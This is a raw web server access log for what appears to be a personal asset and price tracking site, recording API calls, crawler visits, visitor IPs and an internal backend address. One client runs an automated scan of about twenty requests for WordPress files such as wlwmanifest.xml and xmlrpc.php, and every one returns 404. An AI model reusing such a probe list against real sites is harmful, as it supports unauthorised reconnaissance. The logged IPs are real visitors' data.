[17/Feb/2026:10:47:28 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:10:47:28 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:10:47:29 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 211.234.204.1] [Length 1168] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:10:47:29 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 211.234.204.1] [Length 933] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:10:47:29 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 211.234.204.1] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:10:47:45 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 211.234.204.1] [Length 1856] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:10:47:56 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 211.234.204.232] [Length 467] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:11:31:04 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/" [Client 81.29.142.100] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36" "-"
[17/Feb/2026:11:31:15 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 81.29.142.6] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
[17/Feb/2026:12:33:24 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
[17/Feb/2026:12:33:24 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1168] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:12:33:24 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:12:33:24 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:12:33:24 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:12:33:24 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:12:34:23 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 5553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:12:58:40 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
[17/Feb/2026:12:58:40 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1168] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:12:58:40 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 932] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:12:58:40 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:13:01:11 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 14383] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:13:36:00 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-"
[17/Feb/2026:13:36:00 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 211.234.204.1] [Length 1168] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:13:36:00 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 211.234.204.1] [Length 930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:13:36:00 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 211.234.204.1] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:13:36:27 +0000] - 200 200 - POST https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 211.234.204.1] [Length 20] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:13:36:31 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 211.234.204.1] [Length 3242] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:18:19:07 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/" [Client 45.94.31.224] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:18:19:09 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 45.94.31.224] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:18:19:09 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:18:19:09 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//xmlrpc.php?rsd" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:18:19:09 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 45.94.31.224] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:18:19:10 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//blog/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:18:19:10 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//web/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:18:19:10 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wordpress/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:18:19:10 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//website/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:18:19:11 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:18:19:11 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//news/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:18:19:11 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//2018/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:18:19:12 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//2019/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:18:19:12 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//shop/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:18:19:12 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp1/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:18:19:12 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//test/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:18:19:13 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//media/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:18:19:13 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp2/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:18:19:13 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//site/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:18:19:13 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//cms/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:18:19:14 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//sito/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:18:19:14 +0000] - - 400 - - https asset.hanmocnn.co.kr "-" [Client 45.94.31.224] [Length 0] [Gzip -] [Sent-to ] "-" "-"
[17/Feb/2026:19:02:47 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/robots.txt" [Client 74.7.244.29] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-"
[17/Feb/2026:19:02:48 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 74.7.241.33] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-"
[17/Feb/2026:19:02:51 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 74.7.241.33] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:19:02:54 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 74.7.241.33] [Length 17770] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:19:02:57 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 74.7.241.33] [Length 18163] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:19:02:59 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 74.7.241.33] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:19:03:01 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/apple-touch-icon.png" [Client 74.7.241.33] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:19:03:04 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/js/$%7BgetInvestingUrl(symbol)%7D" [Client 74.7.241.33] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://asset.hanmocnn.co.kr/static/js/app.js"
[17/Feb/2026:19:59:38 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
[17/Feb/2026:19:59:38 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:19:59:38 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:19:59:38 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1167] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:19:59:38 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:19:59:38 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:19:59:38 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 181] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:19:59:38 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:20:00:22 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
[17/Feb/2026:20:00:22 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 4146] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:20:00:22 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1167] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:20:00:22 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:20:00:22 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 181] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:20:01:27 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 5982] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:20:57:52 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
[17/Feb/2026:20:57:52 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1167] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:20:57:52 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 932] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:20:57:52 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 181] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:20:58:30 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 3686] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:23:04:17 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 18.219.145.200] [Length 2074] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0" "-"
[18/Feb/2026:03:16:32 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/" [Client 139.59.91.96] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-"
[18/Feb/2026:03:16:33 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/favicon.ico" [Client 139.59.91.96] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "http://asset.hanmocnn.co.kr/"
[18/Feb/2026:03:16:33 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 139.59.91.96] [Length 2074] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-"
[18/Feb/2026:03:16:36 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 139.59.91.96] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "https://asset.hanmocnn.co.kr/"
[18/Feb/2026:03:50:48 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
[18/Feb/2026:03:50:48 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1168] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
